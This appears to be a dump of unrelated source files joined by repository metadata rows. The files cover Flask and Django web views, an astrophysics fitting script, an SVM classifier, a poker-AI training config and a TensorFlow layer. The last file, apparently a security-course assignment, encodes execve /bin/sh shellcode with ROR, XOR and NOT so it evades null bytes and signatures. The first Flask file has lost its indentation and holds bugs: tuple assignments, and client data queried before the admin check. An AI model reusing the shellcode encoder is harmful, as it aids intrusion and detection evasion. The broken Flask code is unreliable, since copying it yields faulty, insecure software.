from app.models import db, User, Type
from app.forms import UpdateUserForm
from .auth_routes import authenticate, validation_errors_to_error_messages
user_routes = Blueprint('users', __name__)
@user_routes.route("/types")
def types():
types = db.session.query(Type).all()
return jsonify([type.name_to_id() for type in types])
@user_routes.route('/')
@login_required
def users():
users = db.session.query(User).all()
return jsonify([user.to_dict_full() for user in users])
@user_routes.route('/<int:id>')
@login_required
def user(id):
user = User.query.get(id)
return user.to_dict()
@user_routes.route('/<int:id>', methods=["DELETE"])
@login_required
def user_delete(id):
user = User.query.get(id)
db.session.delete(user)
db.session.commit()
return { id: "Successfully deleted" }
@user_routes.route('/<int:id>', methods=["POST"])
@login_required
def user_update(id):
user = User.query.options(joinedload("type")).get(id)
form = UpdateUserForm()
form['csrf_token'].data = request.cookies['csrf_token']
if form.validate_on_submit():
print("_______ FORM DATA",form.data)
user.username=form.data['username'],
user.email=form.data['email'],
user.hashed_password=generate_password_hash(form.password.data),
user.first_name=form.data['first_name'],
user.last_name=form.data['last_name'],
user.type_id=form.data['type_id'],
user.updated_at=datetime.now()
db.session.commit()
return user.to_dict_full()
return {'errors': validation_errors_to_error_messages(form.errors)}
@user_routes.route("/<int:id>/clients")
@login_required
def admin_fetch_clients(id):
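    # only admins (type_id 1) may list client users (type_id 2)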
authenticated = authenticate()
clientUsers = db.session.query(User).filter_by(type_id=2).all()
if authenticated["type_id"] != 1:
return jsonify({
"errors": [
"Unauthorized"
]
})
return jsonify([user.to_dict_full() for user in clientUsers])
| 30.013514 | 74 | 0.692031 | 296 | 2,221 | 4.969595 | 0.283784 | 0.047587 | 0.061183 | 0.048946 | 0.182189 | 0.112848 | 0.048946 | 0.048946 | 0.048946 | 0 | 0 | 0.001086 | 0.170644 | 2,221 | 73 | 75 | 30.424658 | 0.797503 | 0 | 0 | 0.15 | 1 | 0 | 0.088699 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.033333 | 0.133333 | 0 | 0.366667 | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c782a4a5ddbb4061270df891d7584a13d55d2191 | 6,325 | py | Python | paul_analysis/Python/labird/gamma.py | lzkelley/arepo-mbh-sims_analysis | f14519552cedd39a040b53e6d7cc538b5b8f38a3 | [
"MIT"
] | null | null | null | paul_analysis/Python/labird/gamma.py | lzkelley/arepo-mbh-sims_analysis | f14519552cedd39a040b53e6d7cc538b5b8f38a3 | [
"MIT"
] | null | null | null | paul_analysis/Python/labird/gamma.py | lzkelley/arepo-mbh-sims_analysis | f14519552cedd39a040b53e6d7cc538b5b8f38a3 | [
"MIT"
] | null | null | null | """Module for finding an effective equation of state for in the Lyman-alpha forest
from a snapshot. Ported to python from Matteo Viel's IDL script."""
import h5py
import math
import numpy as np
def read_gamma(num,base):
"""Reads in an HDF5 snapshot from the NE gadget version, fits a power law to the
equation of state for low density, low temperature gas.
Inputs:
num - snapshot number
base - Snapshot directory
Outputs:
(T_0, \gamma) - Effective equation of state parameters
"""
# Baryon density parameter
omegab0 = 0.0449
singlefile=False
#base="/home/spb41/data2/runs/bf2/"
snap=str(num).rjust(3,'0')
fname=base+"/snapdir_"+snap+"/snap_"+snap
try:
f=h5py.File(fname+".0.hdf5",'r')
except IOError:
fname=base+"/snap_"+snap
f=h5py.File(fname+".hdf5",'r')
singlefile=True
print 'Reading file from:',fname
head=f["Header"].attrs
npart=head["NumPart_ThisFile"]
redshift=head["Redshift"]
print "z=",redshift
atime=head["Time"]
h100=head["HubbleParam"]
if npart[0] == 0 :
print "No gas particles!\n"
return
f.close()
# Scaling factors and constants
Xh = 0.76 # Hydrogen fraction
G = 6.672e-11 # N m^2 kg^-2
kB = 1.3806e-23 # J K^-1
Mpc = 3.0856e22 # m
kpc = 3.0856e19 # m
Msun = 1.989e30 # kg
mH = 1.672e-27 # kg
H0 = 1.e5/Mpc # 100 km s^-1 Mpc^-1 in SI units
gamma = 5.0/3.0
rscale = (kpc * atime)/h100 # convert length to m
#vscale = atime**0.5 # convert velocity to km s^-1
mscale = (1e10 * Msun)/h100 # convert mass to kg
dscale = mscale / (rscale**3.0) # convert density to kg m^-3
escale = 1e6 # convert energy/unit mass to J kg^-1
N = 0
sx = 0
sy = 0
sxx = 0
sxy = 0
met = 0
carb = 0
oxy = 0
totmass=0
totigmmass=0
totmet = 0
sxxm = 0
sxym = 0
sxm = 0
sym = 0
for i in np.arange(0,500) :
ffname=fname+"."+str(i)+".hdf5"
if singlefile:
ffname=fname+".hdf5"
if i > 0:
break
#print 'Reading file ',ffname
try:
f=h5py.File(ffname,'r')
except IOError:
break
head=f["Header"].attrs
npart=head["NumPart_ThisFile"]
if npart[0] == 0 :
print "No gas particles in file ",i,"!\n"
break
bar = f["PartType0"]
u=np.array(bar['InternalEnergy'],dtype=np.float64)
rho=np.array(bar['Density'],dtype=np.float64)
nelec=np.array(bar['ElectronAbundance'],dtype=np.float64)
metalic = np.array(bar['GFM_Metallicity'],dtype=np.float64)
metals = np.array(bar['GFM_Metals'],dtype=np.float64)
mass = np.array(bar['Masses'], dtype=np.float64)
#nH0=np.array(bar['NeutralHydrogenAbundance'])
f.close()
# Convert to physical SI units. Only energy and density considered here.
rho *= dscale # kg m^-3, ,physical
u *= escale # J kg^-1
## Mean molecular weight
mu = 1.0 / ((Xh * (0.75 + nelec)) + 0.25)
#temp = mu/kB * (gamma-1) * u * mH
#templog = alog10(temp)
templog=np.log10(mu/kB * (gamma-1) * u * mH)
##### Critical matter/energy density at z=0.0
rhoc = 3 * (H0*h100)**2 / (8. * math.pi * G) # kg m^-3
##### Mean hydrogen density of the Universe
nHc = rhoc /mH * omegab0 *Xh * (1.+redshift)**3.0
##### Physical hydrogen number density
#nH = rho * Xh / mH
### Hydrogen density as a fraction of the mean hydrogen density
overden = np.log10(rho*Xh/mH / nHc)
### Calculates average/median temperature in a given overdensity range#
#overden = rho/(rhoc *omegab)
#ind = where(overden ge -0.01 and overden le 0.01)
#avgT0 = mean(temp(ind))
#medT0 = median(temp(ind))
#loT0 = min(temp(ind))
#hiT0 = max(temp(ind))
#
#avgnH1 = mean(nH0(ind))
#mednH1 = median(nH0(ind))
#lonH1 = min(nH0(ind))
#hinH1 = max(nH0(ind))
#
#print,''
#print,'Temperature (K) at mean cosmic density'
#print,'Average temperature [K,log]:',avgT0,alog10(avgT0)
#print,'Median temperature [K,log]:',medT0,alog10(medT0)
#print,'Maximum temperature [K,log]:',hiT0,alog10(hiT0)
#print,'Minimum temperature [K,log]:',loT0,alog10(loT0)
#
#print
#print,'nH1/nH at mean cosmic density'
#print,'Mean log H1 abundance [nH1/nH,log]:',avgnH1,alog10(avgnH1)
#print,'Median log H1 abundance [nH1/nH,log]:',mednH1,alog10(mednH1)
#print,'Maximum log H1 abundance [nH1/nH,log]:',hinH1,alog10(hinH1)
#print,'Minimum log H1 abundance [nH1/nH,log]:',lonH1,alog10(lonH1)
#print
#
ind2 = np.where((overden > 0) * (overden < 1.5) )
tempfit = templog[ind2]
overdenfit = overden[ind2]
N += np.size(ind2)
#print, "Number of fitting points for equation of state", N
indm = np.where(metals < 1e-10)
metals[indm] = 1e-10
sx += np.sum(overdenfit)
sy += np.sum(tempfit)
sxx += np.sum(overdenfit*overdenfit)
sxy += np.sum(overdenfit*tempfit)
met += np.sum(mass[ind2]*metalic[ind2])
carb += np.sum(mass[ind2]*metals[ind2,2])
oxy += np.sum(mass[ind2]*metals[ind2,4])
totmet += np.sum(mass*metalic)
totmass += np.sum(mass)
totigmmass += np.sum(mass[ind2])
sym += np.sum(np.log10(metals[ind2,2]))
sxym += np.sum(overdenfit*np.log10(metals[ind2,2]))
# log T = log(T_0) + (gamma-1) log(rho/rho_0)
# and use least squares fit.
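    # closed-form simple linear regression: intercept a = log10(T_0), slope b = gamma - 1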
delta = (N*sxx)-(sx*sx)
a = ((sxx*sy) - (sx*sxy))/delta
b = ((N*sxy) - (sx*sy))/delta
amet = ((sxx*sym) - (sx*sxym))/delta
bmet = ((N*sxym) - (sx*sym))/delta
print num,": gamma", b+1.0," log(T0)", a," T0 (K)", (10.0)**a, "Metallicity: ", met/totigmmass,totmet/totmass, "[C/H,O/H]: ",carb/totigmmass, oxy/totigmmass,"(a_Z, b_Z): ",10**amet, bmet
return (redshift,10.0**a, b+1)
| 32.772021 | 192 | 0.552727 | 877 | 6,325 | 3.971494 | 0.297605 | 0.017227 | 0.020098 | 0.019523 | 0.109101 | 0.084984 | 0.039047 | 0.039047 | 0 | 0 | 0 | 0.062134 | 0.297708 | 6,325 | 192 | 193 | 32.942708 | 0.721972 | 0.286008 | 0 | 0.137615 | 0 | 0 | 0.080321 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.027523 | null | null | 0.045872 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c785fce89075a58bb84f43684cf4f43e70fff95c | 3,561 | py | Python | MySite/MainApp/views.py | tananyan/siteee | f90c4ed56122d1af2f3795a0f16c3f294b785ad3 | [
"MIT"
] | 1 | 2021-11-29T14:50:09.000Z | 2021-11-29T14:50:09.000Z | MySite/MainApp/views.py | tananyan/siteee | f90c4ed56122d1af2f3795a0f16c3f294b785ad3 | [
"MIT"
] | null | null | null | MySite/MainApp/views.py | tananyan/siteee | f90c4ed56122d1af2f3795a0f16c3f294b785ad3 | [
"MIT"
] | null | null | null | from django.shortcuts import render
from django.views.generic.edit import FormView
from django.views.generic.edit import View
from . import forms
# Once again, thanks django for the ready-made authentication form.
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import logout
from django.http import HttpResponseRedirect
from django.contrib.auth import login
class index(FormView):
form_class = AuthenticationForm
    # As with registration, but using the authentication template.
    template_name = "MainApp/homepage.html"
    # On success, redirect to the home page.
    success_url = "/"
def get(self, request):
form1 = AuthenticationForm(request.POST)
return render(request, 'MainApp/homepage.html',
{'form': form1, 'user': request.user})
def form_valid(self, form):
        # Get the user object from the data entered into the form.
        self.user = form.get_user()
        # Authenticate the user.
        login(self.request, self.user)
return super(index, self).form_valid(form)
class contact(FormView):
form_class = AuthenticationForm
    # As with registration, but using the authentication template.
    template_name = "MainApp/contact.html"
    # On success, redirect to the home page.
    success_url = "../contact/"
def get(self, request):
form1 = AuthenticationForm(request.POST)
return render(request, 'MainApp/contact.html',
                      {'values': ['Call us by phone', 'boris@yandex.ru', '8(977)335-77-77'], 'form': form1, 'user': request.user})
def form_valid(self, form):
        # Get the user object from the data entered into the form.
        self.user = form.get_user()
        # Authenticate the user.
        login(self.request, self.user)
return super(contact, self).form_valid(form)
class registration(FormView):
form_class = forms.UserCreationForm
    # URL the user is redirected to after a successful registration.
    # Here it points to the login page for registered users.
    success_url = "/login/"
    # Template used to render this view.
    template_name = "MainApp/registration_form.html"
def form_valid(self, form):
        # Create the user if the form data was entered correctly.
        form.save()
        # Call the base class method
return super(registration, self).form_valid(form)
class LogoutView(View):
def get(self, request):
        # Log out the user who requested this view.
        logout(request)
        # Then redirect the user to the home page.
        #return HttpResponseRedirect("/seeuagain")
return render(request, 'MainApp/quitpage.html')
class LoginFormView(FormView):
form_class = AuthenticationForm
    # As with registration, but using the authentication template.
    template_name = "MainApp/login_form.html"
    # On success, redirect to the home page.
    success_url = "/news"
def form_valid(self, form):
        # Get the user object from the data entered into the form.
        self.user = form.get_user()
        # Authenticate the user.
        login(self.request, self.user)
return super(LoginFormView, self).form_valid(form)
| 33.914286 | 134 | 0.686043 | 387 | 3,561 | 6.248062 | 0.307494 | 0.029777 | 0.028122 | 0.026468 | 0.568652 | 0.510753 | 0.484285 | 0.484285 | 0.484285 | 0.424731 | 0 | 0.005492 | 0.233081 | 3,561 | 104 | 135 | 34.240385 | 0.879897 | 0.335861 | 0 | 0.352941 | 0 | 0 | 0.112104 | 0.051809 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137255 | false | 0 | 0.156863 | 0 | 0.764706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c787d4b85054cce4a273d4cda061e7e65933333a | 3,351 | py | Python | PhysicsTools/PythonAnalysis/python/ParticleDecayDrawer.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | PhysicsTools/PythonAnalysis/python/ParticleDecayDrawer.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | PhysicsTools/PythonAnalysis/python/ParticleDecayDrawer.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | # Benedikt Hegner, DESY
# benedikt.hegner@cern.ch
#
# this tool is based on Luca Lista's tree drawer module
class ParticleDecayDrawer(object):
"""Draws particle decay tree """
def __init__(self):
print "Init particleDecayDrawer"
# booleans: printP4 printPtEtaPhi printVertex
def _accept(self, candidate, skipList):
        if candidate in skipList:
            return False
return self._select(candidate)
def _select(self, candidate):
return candidate.status() == 3
def _hasValidDaughters(self, candidate):
nDaughters = candidate.numChildren()
for i in xrange(nDaughters):
if self._select(candidate.listChildren()[i]): return True
return False
def _printP4(self, candidate):
return " "
def _decay(self, candidate, skipList):
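        # recursively renders "pdgId -> ( children ... )", marking visited candidates in skipList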
out = str()
if candidate in skipList:
return ""
skipList.append(candidate)
id = candidate.pdg_id()
# here the part about the names :-(
out += str(id) + self._printP4(candidate)
validDau = 0
nOfDaughters = candidate.numChildren()
for i in xrange(nOfDaughters):
if self._accept(candidate.listChildren()[i], skipList): validDau+=1
if validDau == 0: return out
out += " ->"
for i in xrange(nOfDaughters):
d = candidate.listChildren()[i]
if self._accept(d, skipList):
decString = self._decay(d, skipList)
if ("->" in decString): out += " ( %s ) " %decString
else: out += " %s" %decString
return out
def draw(self, particles):
""" draw decay tree from list(HepMC.GenParticles)"""
skipList = []
nodesList = []
momsList = []
for particle in particles:
if particle.numParents() > 1:
if self._select(particle):
skipList.append(particle)
nodesList.append(particle)
for j in xrange(particle.numParents()):
mom = particle.listParents()[j]
                    while mom.mother():
mom = mom.mother()
if self._select(mom):
momsList.append(mom)
print "-- decay --"
if len(momsList) > 0:
if len(momsList) > 1:
for m in xrange(len(momsList)):
decString = self._decay( momsList[m], skipList)
if len(decString) > 0:
print "{ %s } " %decString
else:
print self._decay(momsList[0], skipList)
if len(nodesList) > 0:
print "-> "
if len(nodesList) > 1:
for node in nodesList:
skipList.remove(node)
decString = self._decay(node, skipList)
if len(decString) > 0:
if "->" in decString: print " ( %s ) " %decString
else: print " " + decString
else:
skipList.remove(nodesList[0])
print self._decay(nodesList[0], skipList)
print
| 33.848485 | 81 | 0.497165 | 310 | 3,351 | 5.303226 | 0.270968 | 0.018248 | 0.010949 | 0.021898 | 0.150852 | 0.038929 | 0 | 0 | 0 | 0 | 0 | 0.008487 | 0.402268 | 3,351 | 98 | 82 | 34.193878 | 0.812282 | 0.057296 | 0 | 0.111111 | 0 | 0 | 0.023802 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.152778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c78c8acd4546ee0e8cf65b0df48d4a928c3e7481 | 1,262 | py | Python | model/model.py | CaoHoangTung/shark-cop-server | 38cb494d45297b723b4ef6bf82b8c9e53c2993a0 | [
"MIT"
] | 2 | 2020-10-02T03:01:32.000Z | 2020-12-06T09:21:06.000Z | model/model.py | CaoHoangTung/shark-cop-server | 38cb494d45297b723b4ef6bf82b8c9e53c2993a0 | [
"MIT"
] | null | null | null | model/model.py | CaoHoangTung/shark-cop-server | 38cb494d45297b723b4ef6bf82b8c9e53c2993a0 | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.metrics import classification_report, confusion_matrix
from mlxtend.plotting import plot_decision_regions
# from sklearn import datasets
from pandas.plotting import scatter_matrix
from joblib import dump, load
import collections
kaggle_data = pd.read_csv('data/kaggle.csv')
data = pd.read_csv('data/new_data.csv')
kaggle_X = kaggle_data.iloc[:, :30].values
X = data.drop(['index'],axis=1).iloc[:, :30].values
y = data.iloc[:,-1].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.99)
kaggle_X_train, kaggle_X_test, kaggle_y_train, kaggle_y_test = train_test_split(X, y, test_size = 0.02)
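# NOTE: despite the name, kaggle_X_train is split from new_data's X above, not from kaggle.csv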
svclassifier = SVC(kernel='poly',degree=5)
svclassifier.fit(kaggle_X_train, kaggle_y_train)
dump(svclassifier, 'pre_model.joblib')
y_pred = svclassifier.predict(X_test)
print(confusion_matrix(y_test,y_pred))
print(classification_report(y_test,y_pred))
# print("X=%s, Predicted=%s" % (test_2d, y_pred_test[0]))
# print(y_pred.shape)
# TESTING ZONE
X = [[-1,1,0,-1,-1,-1,1,0,-1,1,1,-1,0,0,-1,-1,-1,-1,0,1,0,0,0,-1,1,1,1,1,-1,-1]]
print("PREDICTION:",svclassifier.predict(X))
| 33.210526 | 103 | 0.759113 | 225 | 1,262 | 4.04 | 0.306667 | 0.035204 | 0.036304 | 0.030803 | 0.168317 | 0.09791 | 0.088009 | 0.080308 | 0.066007 | 0.066007 | 0 | 0.039301 | 0.09271 | 1,262 | 37 | 104 | 34.108108 | 0.754585 | 0.09271 | 0 | 0 | 0 | 0 | 0.059649 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0.12 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
c78d62ba8abdde61ef2fb89e7ca95a09bbcfc5d2 | 282 | py | Python | v1/models.py | jdubansky/openstates.org | 6fd5592aae554c4bb201f0a76ed3605bff5204c2 | [
"MIT"
] | 1 | 2022-01-17T11:54:28.000Z | 2022-01-17T11:54:28.000Z | v1/models.py | washabstract/openstates.org | dc541ae5cd09dd3b3db623178bf32a03d0246f01 | [
"MIT"
] | null | null | null | v1/models.py | washabstract/openstates.org | dc541ae5cd09dd3b3db623178bf32a03d0246f01 | [
"MIT"
] | null | null | null | from django.db import models
from openstates.data.models import Bill
class LegacyBillMapping(models.Model):
legacy_id = models.CharField(max_length=20, primary_key=True)
bill = models.ForeignKey(
Bill, related_name="legacy_mapping", on_delete=models.CASCADE
)
| 28.2 | 69 | 0.758865 | 37 | 282 | 5.621622 | 0.72973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008368 | 0.152482 | 282 | 9 | 70 | 31.333333 | 0.861925 | 0 | 0 | 0 | 0 | 0 | 0.049645 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c794ff339d897246d1f9ee7d50c25c7781c1ee06 | 3,286 | py | Python | mo_leduc.py | mohamedun/Deep-CFR | ec3a7fb06e11bd6cc65bb2bf6f16108ee41f7234 | [
"MIT"
] | null | null | null | mo_leduc.py | mohamedun/Deep-CFR | ec3a7fb06e11bd6cc65bb2bf6f16108ee41f7234 | [
"MIT"
] | null | null | null | mo_leduc.py | mohamedun/Deep-CFR | ec3a7fb06e11bd6cc65bb2bf6f16108ee41f7234 | [
"MIT"
] | null | null | null | from PokerRL.game.games import StandardLeduc
from PokerRL.game.games import BigLeduc
from PokerRL.eval.rl_br.RLBRArgs import RLBRArgs
from PokerRL.eval.lbr.LBRArgs import LBRArgs
from PokerRL.game.bet_sets import POT_ONLY
from DeepCFR.EvalAgentDeepCFR import EvalAgentDeepCFR
from DeepCFR.TrainingProfile import TrainingProfile
from DeepCFR.workers.driver.Driver import Driver
import pdb
if __name__ == '__main__':
ctrl = Driver(t_prof=TrainingProfile(name="MO_LEDUC_BigLeduc_LBR",
nn_type="feedforward",
eval_agent_export_freq=3,
checkpoint_freq=3,
n_learner_actor_workers=5,
max_buffer_size_adv=1e6,
n_traversals_per_iter=500,
n_batches_adv_training=250,
mini_batch_size_adv=2048,
game_cls=BigLeduc,
n_units_final_adv=64,
n_merge_and_table_layer_units_adv=64,
init_adv_model="random", # warm start neural weights with init from last iter
use_pre_layers_adv=False, # shallower nets
use_pre_layers_avrg=False, # shallower nets
# You can specify one or both modes. Choosing both is useful to compare them.
eval_modes_of_algo=(
EvalAgentDeepCFR.EVAL_MODE_SINGLE, # SD-CFR
),
DISTRIBUTED=True,
log_verbose=True,
rl_br_args=RLBRArgs(rlbr_bet_set=None,
n_hands_each_seat=200,
n_workers=1,
# Training
DISTRIBUTED=False,
n_iterations=100,
play_n_games_per_iter=50,
# The DDQN
batch_size=512,
),
lbr_args=LBRArgs(n_lbr_hands_per_seat=30000,
n_parallel_lbr_workers=10,
DISTRIBUTED=True,
),
),
eval_methods={'br': 1,
#'rlbr': 1,
'lbr': 1,
},
n_iterations=12)
ctrl.run()
pdb.set_trace()
| 54.766667 | 119 | 0.370663 | 240 | 3,286 | 4.725 | 0.533333 | 0.048501 | 0.039683 | 0.035273 | 0.045855 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031734 | 0.587645 | 3,286 | 59 | 120 | 55.694915 | 0.805166 | 0.058125 | 0 | 0.122449 | 0 | 0 | 0.016526 | 0.006805 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.183673 | 0 | 0.183673 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c79a2fb3f10def9e365b5ba6af795f7018c3bbe1 | 693 | py | Python | museflow/components/embedding_layer.py | BILLXZY1215/museflow | 241a98ef7b3f435f29bd5d2861ac7b17d4c091d8 | [
"BSD-3-Clause"
] | null | null | null | museflow/components/embedding_layer.py | BILLXZY1215/museflow | 241a98ef7b3f435f29bd5d2861ac7b17d4c091d8 | [
"BSD-3-Clause"
] | null | null | null | museflow/components/embedding_layer.py | BILLXZY1215/museflow | 241a98ef7b3f435f29bd5d2861ac7b17d4c091d8 | [
"BSD-3-Clause"
] | null | null | null | from .component import Component, using_scope
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
class EmbeddingLayer(Component):
def __init__(self, input_size, output_size, name='embedding'):
Component.__init__(self, name=name)
self.input_size = input_size
self.output_size = output_size
with self.use_scope():
self.embedding_matrix = tf.get_variable(
'embedding_matrix', shape=[self.input_size, self.output_size])
self._built = True
@using_scope
def embed(self, x):
return tf.nn.embedding_lookup(self.embedding_matrix, x)
def __call__(self, inputs):
return self.embed(inputs)
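

# Usage sketch (hypothetical names/shapes):
#
#   layer = EmbeddingLayer(input_size=vocab_size, output_size=128)
#   embedded = layer(token_ids)  # int tensor [batch, time] -> floats [batch, time, 128]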
| 27.72 | 78 | 0.681097 | 88 | 693 | 5.011364 | 0.431818 | 0.081633 | 0.088435 | 0.086168 | 0.104308 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003717 | 0.223665 | 693 | 24 | 79 | 28.875 | 0.815985 | 0 | 0 | 0 | 0 | 0 | 0.036075 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.176471 | false | 0 | 0.117647 | 0.117647 | 0.470588 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
c7a2778b2130c187c84f5bc78fd439f687e7ad10 | 450 | py | Python | passy_forms/forms/forms.py | vleon1/passy | fe48ed9f932eb6df9dbe463344b034218c81567b | [
"Apache-2.0"
] | null | null | null | passy_forms/forms/forms.py | vleon1/passy | fe48ed9f932eb6df9dbe463344b034218c81567b | [
"Apache-2.0"
] | 19 | 2017-02-18T17:53:56.000Z | 2017-03-11T22:09:06.000Z | passy_forms/forms/forms.py | vleon1/passy | fe48ed9f932eb6df9dbe463344b034218c81567b | [
"Apache-2.0"
] | null | null | null | from django.forms import forms
class Form(forms.Form):
def get_value(self, name):
self.is_valid() # making sure we tried to clean the data before accessing it
if self.is_bound and name in self.cleaned_data:
return self.cleaned_data[name]
field = self[name]
return field.value() or ""
def to_dict(self):
return {name: self.get_value(name) for name in self.fields}
| 23.684211 | 86 | 0.622222 | 65 | 450 | 4.2 | 0.538462 | 0.058608 | 0.07326 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.295556 | 450 | 18 | 87 | 25 | 0.861199 | 0.128889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.1 | 0.1 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c7a2d818488a83ba3e02cfaea886aa5551f314ae | 1,172 | py | Python | assignment4/rorxornotencode.py | gkweb76/SLAE | c0aef9610a5f75568a0e65c4a91a3bb5a56e6fc6 | [
"MIT"
] | 15 | 2015-08-11T09:50:00.000Z | 2021-10-02T19:30:53.000Z | assignment4/rorxornotencode.py | gkweb76/SLAE | c0aef9610a5f75568a0e65c4a91a3bb5a56e6fc6 | [
"MIT"
] | null | null | null | assignment4/rorxornotencode.py | gkweb76/SLAE | c0aef9610a5f75568a0e65c4a91a3bb5a56e6fc6 | [
"MIT"
] | 9 | 2015-08-11T09:51:55.000Z | 2021-10-18T18:04:11.000Z | #!/usr/bin/python
# Title: ROR/XOR/NOT encoder
# File: rorxornotencode.py
# Author: Guillaume Kaddouch
# SLAE-681
import sys
ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
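
# per-byte encoding pipeline: ROR by 7 bits -> XOR 0xAA -> NOT
# (a matching decoder stub would reverse it: NOT -> XOR 0xAA -> ROL by 7)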
shellcode = (
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)
encoded = ""
encoded2 = ""
print "[*] Encoding shellcode..."
for x in bytearray(shellcode):
# ROR & XOR encoding
z = ror(x, 7, 8)^0xAA
# NOT encoding
y = ~z
if str('%02x' % (y & 0xff)).upper() == "00":
print ">>>>>>>>>> NULL detected in shellcode, aborting."
sys.exit()
if str('%02x' % (y & 0xff)).upper() == "0A":
print ">>>>>>>>>> \\xOA detected in shellcode."
if str('%02x' % (y & 0xff)).upper() == "0D":
print ">>>>>>>>>>> \\x0D detected in shellcode."
encoded += '\\x'
encoded += '%02x' % (y & 0xff)
encoded2 += '0x'
encoded2 += '%02x,' %(y & 0xff)
print "hex version : %s" % encoded
print "nasm version : %s" % encoded2
print "encoded shellcode : %s bytes" % str(len(encoded)/4)
| 23.44 | 102 | 0.562287 | 164 | 1,172 | 3.963415 | 0.481707 | 0.064615 | 0.061538 | 0.055385 | 0.129231 | 0.083077 | 0 | 0 | 0 | 0 | 0 | 0.080698 | 0.217577 | 1,172 | 49 | 103 | 23.918367 | 0.628135 | 0.116041 | 0 | 0 | 0 | 0.037037 | 0.336249 | 0.097182 | 0 | 0 | 0.023324 | 0 | 0 | 0 | null | null | 0 | 0.037037 | null | null | 0.259259 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
